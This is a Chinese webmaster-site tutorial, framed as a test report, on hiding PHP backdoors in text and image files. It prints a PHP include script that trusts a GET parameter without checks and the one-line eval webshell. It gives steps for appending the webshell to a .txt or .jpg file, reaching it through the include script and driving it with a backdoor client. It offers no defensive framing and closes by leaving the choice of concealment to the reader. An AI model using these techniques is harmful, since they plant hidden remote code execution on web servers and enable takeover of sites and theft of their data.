加入收藏 | 设为首页 | 会员中心 | 我要投稿 鹰潭站长网 (https://www.0701zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > PHP教程 > 正文

PHP网站后门的隐藏方法测试报告

发布时间:2022-03-11 09:15:45 所属栏目:PHP教程 来源:互联网
导读:要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。 我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件
  要知道如果光把PHP语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
 
  我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。
 
 
  有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
 
  首先建立一PHP文件test.php 文件内容为:
 
  以下为引用的内容:
  <?php
  $test=$_GET['test'];
  @include 'test/'.$test;
  ?>
  Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马<?eval($_POST[cmd]);?>粘贴到t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 密码里添入cmd就可以了,执行返回的结果都可以看到。
 
  
  下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把<?eval($_POST[cmd]);?>插入到图片末尾。
 
  经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 <http://localhost/test/test.php?test=../1.jpg>我们查看PHP环境变量 返回的是结果是原图片。
  
  到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。

(编辑:鹰潭站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    热点阅读